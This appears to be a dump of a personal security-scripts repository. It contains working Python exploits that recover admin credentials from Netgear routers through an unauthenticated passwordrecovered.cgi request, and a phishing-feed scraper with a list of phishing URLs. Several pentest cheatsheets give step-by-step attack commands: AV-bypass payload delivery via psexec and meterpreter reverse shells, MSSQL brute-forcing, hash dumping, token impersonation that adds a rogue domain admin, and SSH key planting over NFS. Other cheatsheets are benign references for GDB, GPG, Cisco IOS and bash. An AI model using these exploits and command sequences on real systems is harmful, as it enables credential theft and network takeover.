| print "not a netgear router" 33 | sys.exit(0) 34 | token = scrape(r.text, 'unauth.cgi?id=', '\"') 35 | if token == 'i_dont_speak_english': 36 | print "not vulnerable" 37 | sys.exit(0) 38 | print "token found: " + token 39 | #pass the token - get the password 40 | url = url + 'passwordrecovered.cgi?id=' + token 41 | r = requests.post(url, verify=False) 42 | if r.text.find('left\">') != -1: 43 | username = (repr(scrape(r.text, 'Router Admin Username', ''))) 44 | username = scrape(username, '>', '\'') 45 | password = (repr(scrape(r.text, 'Router Admin Password', ''))) 46 | password = scrape(password, '>', '\'') 47 | if username == "i_dont_speak_english": 48 | username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '')) 49 | password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '')) 50 | else: 51 | print "not vulnerable becuse password recovery IS set" 52 | sys.exit(0) 53 | #html encoding 54 | password = password.replace("#","#") 55 | password = password.replace("&","&") 56 | print "user: " + username 57 | print "pass: " + password 58 | -------------------------------------------------------------------------------- /NetGear_Exploits/passwrd_cgi_exploit.py: -------------------------------------------------------------------------------- 1 | """This can easily be reproduced using the attached poc, or by sending a simple 2 | request via the browser: 3 | 1. http://router/passwordrecovered.cgi?id=Example will give you credentials 4 | (some models require you to send a post request instead of get) 5 | """ 6 | 7 | import sys 8 | import requests 9 | 10 | def scrape(text, start_trig, end_trig): 11 | if text.find(start_trig) != -1: 12 | return text.split(start_trig, 1)[-1].split(end_trig, 1)[0] 13 | else: 14 | return "i_dont_speak_english" 15 | 16 | requests.packages.urllib3.disable_warnings() 17 | 18 | ip = sys.argv[1] 19 | port = sys.argv[2] 20 | url = 'http://' + ip + ':' + port + '/' 21 | try: 22 | r = requests.get(url) 23 | except: 24 | url = 'https://' + ip + ':' + port + '/' 25 | r = requests.get(url, verify=False) 26 | model = r.headers.get('WWW-Authenticate') 27 | if model is not None: 28 | print "Attcking: " + model[13:-1] 29 | else: 30 | print "not a netgear router" 31 | sys.exit(0) 32 | 33 | url = url + 'passwordrecovered.cgi?id=get_rekt' 34 | try: 35 | r = requests.post(url, verify=False) 36 | except: 37 | print "not vulnerable router" 38 | sys.exit(0) 39 | if r.text.find('left\">') != -1: 40 | username = (repr(scrape(r.text, 'Router Admin Username', ''))) 41 | username = scrape(username, '>', '\'') 42 | password = (repr(scrape(r.text, 'Router Admin Password', ''))) 43 | password = scrape(password, '>', '\'') 44 | if username == "i_dont_speak_english": 45 | username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '')) 46 | password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '')) 47 | else: 48 | print "not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again" 49 | sys.exit(0) 50 | #html encoding 51 | password = password.replace("#","#") 52 | password = password.replace("&","&") 53 | print "user: " + username 54 | print "pass: " + password 55 | -------------------------------------------------------------------------------- /Open_Phish/db_create.py: -------------------------------------------------------------------------------- 1 | __author__ = "Santhosh Baswa" 2 | __copyright__ = "Copyright 2016, Independent Security Research" 3 | 4 | import sqlite3 5 | import sqlite3 6 | a = raw_input("Enter the db:") 7 | conn = sqlite3.connect(a) 8 | c = conn.cursor() 9 | # Create table 10 | c.execute('''CREATE TABLE openphishdb 11 | (phishpage text, domain text ,ipaddr text)''') 12 | 13 | c.execute("INSERT INTO openphishdb VALUES ('www.google.com/search','www.google.com','8.8.8.8')") 14 | 15 | conn.commit() 16 | conn.close() 17 | -------------------------------------------------------------------------------- /Open_Phish/feed.txt: -------------------------------------------------------------------------------- 1 | http://www.t-alquds.org/wp-includes/fonts/hmr/profile.html/?ssl=yes 2 | http://www.gosgmart.com/db/itrackt/directiondereboursement 3 | http://www.gosgmart.com/image/cache/data/onsale/direction-general/redirection.php 4 | http://docsiign.ladyofelegance.net/sharingOPLy3sourcePS8tMTtVLzs/office.php 5 | http://bigappsidea.com/googledoc 6 | http://printouch.com/tmp/html/home/1a2987e61615830cc50b2ad3f54f5968 7 | http://srv-ine-virtual.sistine.gov.ve/images/cobaniet/zanhitroc/uleimigdale/undetiagreuz/vicele/heras/jamol.html 8 | http://verapdpf.info/db/f36d9f83f1824f4d978e79e95459f2f3 9 | http://chap.curemysinus.com/ayo/index.php/index_files/index_files/index_files/index_files/index_files/index_files/index_files/index_files/index_files/index_files/index_files/index_files/index_files/index_files/google/yahoo.jpg 10 | http://www.drdae.biz/boxdrop/1417d11d2f115b14856ffc3fab0cffc7 11 | -------------------------------------------------------------------------------- /Open_Phish/new.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/Open_Phish/new.db -------------------------------------------------------------------------------- /Open_Phish/openphish_old.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/Open_Phish/openphish_old.db -------------------------------------------------------------------------------- /Open_Phish/openphish_websites_database.py: -------------------------------------------------------------------------------- 1 | __author__ = "Santhosh Baswa" 2 | __copyright__ = "Copyright 2016, Independent Security Research" 3 | 4 | from urlparse import urlparse 5 | import re 6 | import socket 7 | import sqlite3 8 | a = raw_input("Enter the db:") 9 | conn = sqlite3.connect(a) 10 | c = conn.cursor() 11 | 12 | def host_to_ip(host): 13 | try: 14 | ips = socket.gethostbyname_ex(host) 15 | except socket.gaierror: 16 | ips=[] 17 | return ips 18 | 19 | lines = [line.rstrip('\n') for line in open('feed_1.txt')] 20 | for i in lines: 21 | parse_domain = urlparse(i) 22 | # print type(parse_domain.netloc) 23 | url = parse_domain.netloc 24 | ips = host_to_ip(url) 25 | str_ips = ','.join(map(str,list(ips))) 26 | #print str_ips 27 | found = re.findall(r'(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})',str_ips) 28 | if found is not None: 29 | l = list(set(found)) 30 | for j in l: 31 | print i 32 | #print db_out() 33 | #print "[+] Adding to Database" 34 | # (phishpage domain ipaddr) 35 | c.execute("INSERT INTO openphishdb (phishpage,domain,ipaddr) VALUES (?,?,?)",(str(i),str(url),str(l))) 36 | print "[+] Inserted ..!!" 37 | conn.commit() 38 | c.execute("SELECT * FROM openphishdb") 39 | for row in c: 40 | print(row) 41 | conn.close() 42 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_AIXBuild.txt: -------------------------------------------------------------------------------- 1 | loslevel: 2 | -------- 3 | 4 | Reports back on installed service pack, maintenance etc. levels of the AIX deployment. 5 | Most of these appear to return absolutely nothing or loads of information. 6 | 7 | oslevel (reports back the overall AIX version e.g. 6.1.0.0) 8 | oslevel -q (reports back known maintenance levels on the host) 9 | oslevel -rq (reports back known Recommended Maintenance Levels, think major releases) 10 | oslevel -sq (reports back known Service Packs - has returned a load of service pack numbers for me, these are useful when looking at products in relation to the service pack) 11 | 12 | e.g. 13 | oslevel -s -g 6100-08-03-1339 14 | 15 | lslpp: 16 | ------ 17 | 18 | Displays information about installed filesets/software and updates. It's particularly useful when coupled with the information returned by itself 19 | 20 | e.g. 21 | lslpp -l (lists all packages, most recent level and state of them) 22 | The package names can be passed back to it for more info, showing their patch management/application cycle. 23 | 24 | e.g. 25 | lslpp -h bos.rte - returns information regarding the updates applied to the Base Operating System package. bos.rte 26 | 27 | rpm: 28 | ---- 29 | 30 | Standard redhat package manager, has turned up on a few machines. 31 | 32 | rpm -qa 33 | rpm -qa --last 34 | These will report back packages installed by rpm and when. 35 | 36 | Other than those, it's the same combination of looking through directories and permissions on files. I usually end up checking through with "find" and the "-perm" flag: 37 | e.g. find /home/ -perm 777 38 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_AVBypass.txt: -------------------------------------------------------------------------------- 1 | 1. Generate executable using Veil. 2 | 3 | 2. In msfconsole setup psexec with relevant payload (windows/meterpreter/reverse_tcp) 4 | 5 | msf > use exploit/windows/smb/psexec 6 | msf exploit(psexec) > set RHOST 192.168.0.2 7 | RHOST => 192.168.0.2 8 | msf exploit(psexec) > set SMBUser user 9 | SMBUser => user 10 | msf exploit(psexec) > set SMBPass pass 11 | SMBPass => pass 12 | msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe 13 | EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe 14 | msf exploit(psexec) > exploit -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_ApacheSSL.txt: -------------------------------------------------------------------------------- 1 | # Enabling Self signed certificates on local website 2 | 3 | 1. Install OpenSSL 4 | 5 | sudo apt-get install openssl 6 | 7 | 2. Run the following command to generate the self signed SSL certificates: 8 | 9 | sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key 10 | 11 | 3. Enable SSL for Apache 12 | 13 | sudo a2enmod ssl 14 | 15 | 4. Put the default-ssl site available creating a symbolic link 16 | 17 | sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf 18 | 19 | 5. Edit the file default-ssl.conf 20 | 21 | sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf 22 | 23 | Change the following lines to point to the certs: 24 | 25 | SSLCertificateFile /etc/ssl/certs/server.crt 26 | SSLCertificateKeyFile /etc/ssl/private/server.key 27 | 28 | 6. Restart Apache 29 | 30 | sudo /etc/init.d/apache2 restart 31 | 32 | More information: 33 | https://hallard.me/enable-ssl-for-apache-server-in-5-minutes/ 34 | https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html 35 | http://www.akadia.com/services/ssh_test_certificate.html 36 | https://www.sslshopper.com/apache-server-ssl-installation-instructions.html 37 | http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_AttackingMSSQL.txt: -------------------------------------------------------------------------------- 1 | [+] Attacking MSSQL with Metasploit 2 | 3 | [>] Enumerate MSSQL Servers on the network: 4 | 5 | msf > use auxiliary/scanner/mssql/mssql_ping 6 | nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156 7 | Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio. 8 | 9 | [>] Bruteforce MSSQL Database: 10 | 11 | msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login 12 | 13 | [>] Enumerate MSSQL Database: 14 | 15 | msf > use auxiliary/admin/mssql/mssql_enum 16 | 17 | [>] Gain shell using gathered credentials 18 | 19 | msf > use exploit/windows/mssql/mssql_payload 20 | msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp 21 | 22 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_BashScripting.txt: -------------------------------------------------------------------------------- 1 | Simple Bash Scripting Cheatsheet 2 | -------------------------------- 3 | 4 | [+] nano Shortcuts 5 | ctrl v Next page. 6 | ctrl y Previous page. 7 | ctrl w Where is (find). 8 | ctrl k Cut that line of test. 9 | ctrl x Exit editor. 10 | 11 | [+] Create a text file: 12 | touch file Creates an empty file. 13 | ifconfig > tmp pipe the output of a command 14 | nano file 15 | 16 | [+] Create a file and append text to it: 17 | ifconfig > tmp 18 | echo >> tmp 19 | ping google.com -c3 >> tmp 20 | 21 | [+] How to view a file: 22 | cat file Show entire contents of file. 23 | more file Show one page at a time. Space bar for next page and (q) to exit. 24 | head file Show the first 10 lines. 25 | head -15 file Show the first 15 lines. 26 | tail file Show the last 10 lines. 27 | tail -15 file Show the last 15 lines. 28 | tail -f file Useful when viewing the output of a log file. 29 | 30 | [+] pipe 31 | cat tmp | grep Bcast Feeds the output of one process to the input of another process. 32 | 33 | [+] Processes 34 | ps aux Show all running process for all users. 35 | kill -9 PID Nicely kill a PID. 36 | 37 | [+] Word Count 38 | wc -l tmp2 Count the number of lines in a file 39 | 40 | [+] cut 41 | -d delimiter 42 | -f fields 43 | 44 | [+] sort 45 | Sort by unique sort -u file 46 | sort IP addresses correct sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n 47 | cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u Isolate the IP address 48 | 49 | [+] awk 50 | awk '{print $1}' file Show the 1st column. 51 | awk '{print $1,$5}' file Show the 1st and 5th columns. 52 | 53 | [+] grep 54 | grep -v Remove a single string. 55 | grep -v 'red' file 56 | 57 | [+] egrep -v 58 | Remove multiple strings egrep -v '(red|white|blue)' file 59 | 60 | [+] sed 61 | sed 's/FOO/BAR/g' file Replace FOO with BAR. 62 | sed 's/FOO//g' file Replace FOO with nothing. 63 | sed '/^FOO/d' file Remove lines that start with FOO. 64 | 65 | [+] colour 66 | 31=red 32=green 33=yellow 34=blue 35=magenta 36=cyan 67 | echo -e "\e[1;34mThis is a blue text.\e[0m" 68 | 69 | 70 | 71 | 72 | Bash Scripts 73 | ------------ 74 | 75 | [+] Simple bash script: 76 | #!/bin/bash 77 | clear 78 | echo 79 | echo 80 | print "Hello world." 81 | 82 | [+] Make a file executable. 83 | chmod +x file 84 | chmod 755 file 85 | 86 | [+] Variables 87 | name=Bob 88 | echo $name 89 | user=$(whoami) 90 | echo $user 91 | echo 'Hello' $name. 'You are running as' $user. 92 | 93 | #!/bin/bash 94 | clear 95 | echo "Hello World" 96 | name=Bob 97 | ip=`ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1` 98 | echo "Hello" $name "Your IP address is:" $ip 99 | 100 | [+] User Input 101 | read -p "Domain: " domain 102 | 103 | #!/bin/bash 104 | echo "Please input your domain:" 105 | read -p "Domain:" domain 106 | ping -c 5 $domain 107 | 108 | [+] Check For No User Input 109 | if [ -z $domain ]; then 110 | echo 111 | echo "#########################" 112 | echo 113 | echo "Invalid choice." 114 | echo 115 | exit 116 | fi 117 | 118 | [+] For loops 119 | #!/bin/bash 120 | 121 | for host in $(cat hosts.txt) 122 | do 123 | command $host 124 | done 125 | 126 | [+] One Liners 127 | 128 | Port Scan: 129 | for port in $(cat Ports.txt); do nc -nzv 192.168.0.1 $port & sleep 0.5; done -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_BuildReviews.txt: -------------------------------------------------------------------------------- 1 | Build Review Cheatsheet 2 | ----------------------- 3 | 4 | [+] Main tasks: 5 | 6 | Any third party installed software and all associated versions. 7 | Password policy applied locally via net accounts commands. 8 | Domain policy applied, including domain password policy. 9 | Logging settings. 10 | Running services and unquoted service paths. 11 | Permissions set on services. 12 | List of patches and hotfixes installed. 13 | Efficacy of AV solutions. May require import of a benign Eicar test file. 14 | USB policy and removable media access (including firewire, CD etc). 15 | Disk encryption (if relevant) 16 | BIOS passwords set. 17 | Proxy settings (if relevant). 18 | Nessus Scan (With Credentials). 19 | 20 | [+] Windows Hosts: 21 | 22 | [+] Server Roles 23 | [+] Server Manager 24 | [+] System Properties 25 | [+] Default Domain Policy 26 | [+] Global Domain Policy 27 | 28 | [+] Net accounts/Users/groups/Administrators 29 | [+] IPConfig/Routing 30 | 31 | [+] Installed Programs 32 | [+] Installed System Updates 33 | [+] AV Version/Definition Dates 34 | [+] Check Computer folders 35 | 36 | [+] Firewall Configuration 37 | [+] Audit Policy 38 | [+] Password/Lockout Policy 39 | [+] Security Policy 40 | [+] User Rights Policy 41 | 42 | [+] Lanman Parameters (HKLM - System - Current Control - Services - LanmanServer - Parameters) 43 | [+] LSA (HKLM - System - Current Control - Control - LSA) 44 | [+] MSV (HKLM - System - Current Control - Control - LSA - MSV1_0) 45 | 46 | systeminfo command 47 | 48 | BIOS password 49 | boot to usb 50 | file system 51 | - encrypted? 52 | - grab /Windows/System32/config/SAM SECURITY SYSTEM 53 | - put C:\Program.exe (eg calc) 54 | 55 | Control Panel 56 | - Windows Firewall 57 | - enabled 58 | - editable 59 | - logs 60 | - System Info 61 | - Windows Update 62 | 63 | Anti-Virus 64 | - config 65 | - logs 66 | - version 67 | - dates 68 | - EICAR 69 | 70 | cmd.exe 71 | script.cmd 72 | - ipconfig /all 73 | - netstat 74 | - net accounts 75 | - net accounts /domain (review password policy) 76 | - net user hacker Password@1 /add 77 | - regedit 78 | - ping 79 | - sched 80 | - tracert 81 | - net use \\IP address_or_host name\ipc$ "" /user:"" # null session 82 | - net use 83 | - net view 84 | - net start 85 | - tasklist 86 | 87 | mount usb 88 | usb autostart 89 | 90 | copy over files 91 | - nc 92 | - enum 93 | - nmap 94 | - DIRE 95 | - EICAR 96 | 97 | # SAM files in backtrack 98 | /Windows/System32/config/SAM SECURITY SYSTEM 99 | 100 | # mounting on desktop review 101 | # mount 102 | # sda1 = client hdd, sdb2 = my usb part 2 103 | # mkdir /mnt/client-hdd 104 | # mount /dev/sda1 /mnt/client-hdd 105 | # mkdir /mnt/win-usb 106 | # mount /dev/sdb2 /mnt/win-usb 107 | 108 | hosts file C:\Windows\System32\drivers\etc\hosts.txt 109 | 110 | SYSVOL GPO preference item, check for obscured passwords in xml 111 | http://blogs.technet.com/b/grouppolicy/archive/2008/08/04/passwords-in-group-policy-preferences.aspx 112 | 113 | The history file is readable by any authenticated user, as shown below: 114 | C:\Users\All Users\Microsoft\Group Policy\History\{A1C0C41B-D2F8-401B-A5D1-437DA197A809}\Machine\Preferences\Groups\Groups.xml 115 | The same Group Policy Preference XML configuration file is also accessible via the following UNC path on the Domain Controller, again by any authenticated user: 116 | \\Domain_Controller\sysvol\Domain_Name\Policies\{A1C0C41B-D2F8-401B-A5D1-437DA197A809}\Machine\Preferences\Groups\Groups.xml 117 | 118 | 119 | [+] Unix Based Hosts: 120 | 121 | hostname 122 | whoami 123 | uname -a 124 | cat /etc/lsb-release 125 | dmesg | grep Linux 126 | cat /etc/passwd 127 | cat /etc/sudoers 128 | netstat -antup 129 | ps -aux 130 | ps aux | grep root 131 | crontab -l 132 | /sbin/ifconfig -a 133 | iptables -L 134 | arp -e 135 | cat ~/.bash_history 136 | cat ~/.ssh/authorized_keys 137 | mount 138 | 139 | - Check installed applications 140 | - Check installed compilers/interpreters -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_CTF.txt: -------------------------------------------------------------------------------- 1 | CTF Notes 2 | --------- 3 | 4 | # Enumerate Users via Finger 5 | finger user@192.168.0.20 6 | 7 | # Show nfs shares available 8 | showmount -e 192.168.1.54 9 | 10 | # User nfspysh to mount share and create .ssh directory 11 | nfspysh -o server=192.168.0.20:/home/user 12 | mkdir .ssh 13 | cd .ssh 14 | 15 | # Generate ssh key pair 16 | ssh-keygen 17 | cp id_rsa.pub /tmp/authorized_keys 18 | 19 | # Transfer attacker public key to host 20 | put /tmp/authorized_keys 21 | exit 22 | 23 | # Login to SSH server with no password 24 | SSH_AUTH_SOCK=0 ssh user@192.168.0.20 25 | 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_CiscoIOS.txt: -------------------------------------------------------------------------------- 1 | Cisco IOS Command Line Cheatsheet 2 | --------------------------------- 3 | 4 | --- Verify Basic Configuration: 5 | 6 | Shows information about the switch and its interfaces, RAM, NVRAM, flash, IOS, etc. 7 | SW1# show version 8 | 9 | Shows the current configuration file stored in DRAM. 10 | SW1# show running-config 11 | 12 | Shows the configuration file stored in NVRAM which is used at first boot process. 13 | SW1# show startup-config 14 | 15 | Lists the commands currently held in the history buffer. 16 | SW1# show history 17 | 18 | Shows an overview of all interfaces, their physical status, protocol status and ip address if assigned. 19 | SW1# show ip interface brief 20 | 21 | Shows detailed information about the specified interface, its status, protocol, duplex, speed, encapsulation, last 5 min traffic. 22 | SW1# show interface vlan 1 23 | 24 | Shows the description of all interfaces 25 | SW1# show interfaces description 26 | 27 | Shows the status of all interfaces like connected or not, speed, duplex, trunk or access vlan. 28 | SW1# show interfaces status 29 | 30 | Shows the public encryption key used for SSH. 31 | SW1# show crypto key mypubkey rsa 32 | 33 | Shows information about the leased IP address (when an interface is configured to get IP address via a dhcp server) 34 | SW1# show dhcp lease 35 | 36 | --- Router Modes: 37 | 38 | Router>: User mode = Limited to basic monitoring commands 39 | Router#: Privileged mode (exec-level mode) = Provides access to all other router commands 40 | Router(config)#: global configuration mode = Commands that affect the entire system 41 | Router(config-if)#: interface mode = Commands that affect interfaces 42 | Router(config-subif)#: subinterface mode = Commands that affect subinterfaces 43 | Router(config-line)#: line mode = Commands that affect in lines modes (console, vty, aux…) 44 | Router(config-router)#: router configuration mode 45 | 46 | --- Changing switch hostname: 47 | 48 | Switch(config)# hostname SW1 49 | 50 | --- Configuring passwords: 51 | 52 | SW1(config)# enable secret cisco ! MD5 hash 53 | SW1(config)# enable password notcisco ! Clear text 54 | 55 | --- Securing console port: 56 | 57 | SW1(config)# line con 0 58 | SW1(config-line)# password cisco 59 | SW1(config-line)# login 60 | 61 | --- Securing terminal lines: 62 | 63 | SW1(config)# line vty 0 4 64 | SW1(config-line)# password cisco 65 | SW1(config-line)# login 66 | 67 | --- Encrypting passwords: 68 | 69 | SW1(config)# service password-encryption 70 | 71 | --- Configuring banners: 72 | 73 | SW1(config)# banner motd $ 74 | -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 75 | UNAUTHORIZED ACCESS IS PROHIBITED 76 | -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 77 | $ 78 | 79 | --- Giving the switch an IP address: 80 | 81 | SW1(config)# interface vlan 1 82 | SW1(config-if)# ip address 172.16.1.11 255.255.255.0 ! or DHCP 83 | SW1(config-if)# no shutdown 84 | 85 | --- Setting the default gateway: 86 | 87 | SW1(config)# ip default-gateway 172.16.1.1 88 | 89 | --- Saving configuration: 90 | 91 | SW1# copy running-config startup-config 92 | Destination filename [startup-config]? ! Press enter to confirm file name. 93 | Building configuration… 94 | [OK] 95 | 96 | ! Short for write memory. 97 | SW1# wr 98 | Building configuration… 99 | [OK] -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_CookieStealing.txt: -------------------------------------------------------------------------------- 1 | [+] Cookie Stealing: 2 | 3 | [-] Start Web Service 4 | 5 | python -m SimpleHTTPServer 80 6 | 7 | [-] Use one of the following XSS payloads: 8 | 9 | 10 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_DomainAdminExploitation.txt: -------------------------------------------------------------------------------- 1 | [+] After compromising a Windows machine: 2 | 3 | [>] List the domain administrators: 4 | From Shell - net group "Domain Admins" /domain 5 | 6 | [>] Dump the hashes (Metasploit) 7 | msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE 8 | 9 | [>] Find the admins (Metasploit) 10 | spool /tmp/enumdomainusers.txt 11 | msf > use auxiliary/scanner/smb/smb_enumusers_domain 12 | msf > set smbuser Administrator 13 | msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 14 | msf > set rhosts 10.10.10.0/24 15 | msf > set threads 8 16 | msf > run 17 | 18 | msf> spool off 19 | 20 | [>] Compromise Admin's box 21 | meterpreter > load incognito 22 | meterpreter > list_tokens -u 23 | meterpreter > impersonate_token MYDOM\\adaministrator 24 | meterpreter > getuid 25 | meterpreter > shell 26 | 27 | C:\> whoami 28 | mydom\adaministrator 29 | C:\> net user hacker /add /domain 30 | C:\> net group "Domain Admins" hacker /add /domain -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_ExploitDev.txt: -------------------------------------------------------------------------------- 1 | Exploit Development Cheatsheet 2 | ------------------------------ 3 | 4 | [+] Fuzzing: 5 | 6 | import socket 7 | 8 | buffer = ["A"] 9 | counter = 50 10 | 11 | while len(buffer) <= 1000: 12 | buffer.append("A" * counter) 13 | counter = counter + 50 14 | 15 | for buffstring in buffer: 16 | print "Fuzzing:" + str(len(buffstring)) 17 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 18 | sock.connect( ("192.168.0.20", 5555) ) 19 | sock.send(buffstring) 20 | sock.close() 21 | 22 | 23 | [+] Bad Character Testing: 24 | 25 | "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e" 26 | "\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d" 27 | "\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c" 28 | "\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b" 29 | "\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a" 30 | "\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59" 31 | "\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68" 32 | "\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77" 33 | "\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86" 34 | "\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95" 35 | "\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4" 36 | "\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3" 37 | "\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2" 38 | "\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1" 39 | "\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 40 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef" 41 | "\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe" 42 | "\xff" 43 | 44 | 45 | [+] Structured Exception Handler (SEH) Exploitation notes 46 | 47 | - Crash the application 48 | - Check SEH overwirte (view-seh chain) 49 | - Find offset (!mona pattern_create ) 50 | - Find certain SEH references to the cyclic pattern (!mona findmsp) 51 | - Verify offset to NSEH (Next Exception) 52 | - Find POP/POP/RET address with mona (!mona seh -cpb ) 53 | - Add short jump into payload to jump ofver SEH ("\xeb\x06" + 2 bytes of padding) 54 | - Add shellcode to the payload 55 | - Ensure existing padding to make sure the crash still happens. -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_GDB.txt: -------------------------------------------------------------------------------- 1 | set disassembly-flavor intel 2 | 3 | $ cat ~/.bash_aliases | grep gdb 4 | alias gdb='gdb -quiet' 5 | 6 | Running gdb 7 | ------------------ 8 | $ gdb - run, then use file command to load object 9 | $ gdb -quiet - supress copyright information 10 | $ gdb object - normal debug 11 | $ gdb object core - analyze core dump 12 | $ gdb object pid - attach to running process 13 | 14 | General commands 15 | ------------------ 16 | set args - set program arguments 17 | show args - show program arguments 18 | run - run the program 19 | run < file - run with input from file 20 | set follow-exec-mode new/sam - set debugger response to an exec call 21 | set write - set write into executables 22 | set write off - unset write int oexecutables 23 | continue - continue running until break 24 | finish - execute until current stack frame ends 25 | source FILE - read commands from script file 26 | shell [cmd] - run cmd in a shell 27 | display /5i $eip - display expression everytime execution stops 28 | undisplay - undisplay expression number 29 | info functions - list all the functions 30 | info variables - list all the variables 31 | info registers - list most common registers 32 | info all-registers - list all registers 33 | info display - print the list of displayed expressions 34 | backtrace - print backtrace of all stack frames 35 | where - same as backtrace 36 | set disassembly-flavor intel - set disassembly style to intel/att 37 | define hook-[cmd] - actions to execute before command 38 | define hooopost-[cmd] - actions to execute after command 39 | define hook-stop - actions to execute when execution stops 40 | 41 | Breakpoints 42 | ------------------ 43 | info breakpoints - list all breakpoints 44 | break [func] - break function name 45 | break *[addr] - break at address 46 | delete [bnum] - delete breakpoint bnum 47 | break if [cond] - break if condition 48 | ignore [bnum] [count] - ignore breakpoint bnum count times 49 | condition [bnum] $eax == 0x22 - add condition for breakpoint 1 50 | condition [bnum] - delete condition for breakpoint 1 51 | 52 | Watchpoints 53 | ------------------ 54 | info watchpoints - list all the watchpoint 55 | watch variable==value - break when variable equals .. 56 | watch $eax == 0x0000ffaa - break when register equals .. 57 | rwatch *[addr] - break on read memory location 58 | awatch *[addr] - break on read/write memory location -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_GPG.txt: -------------------------------------------------------------------------------- 1 | Encrypt 2 | ------------ 3 | sudo gpg -e ~/Desktop/file.doc 4 | 5 | This will prompt you to type in the persons name (public key) to encrypt with. 6 | 7 | Decrypt 8 | ----------- 9 | sudo gpg -d ~/Desktop/file.doc.pgp > ~/Desktop/file.doc 10 | 11 | 12 | Import other users' public keys by using: 13 | 14 | sudo gpg --import -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_HTTPBasicAuth.txt: -------------------------------------------------------------------------------- 1 | [>] HTTP Basic Authentication Dictionary and Brute-force attacks with Burp Suite 2 | 3 | http://www.dailysecurity.net/2013/03/22/http-basic-authentication-dictionary-and-brute-force-attacks-with-burp-suite/ 4 | 5 | Burp Suite against HTTP Basic authentication 6 | 7 | To implement the attack you need to capture one authentication request with Burp Proxy and send it to Burp Intruder. 8 | 9 | Mark only the Base64 encoded string and click Add button to put the markers around it. 10 | 11 | Dictionary attack 12 | 13 | For the dictionary attack I’m using custom iterator intruder option. It allows you to 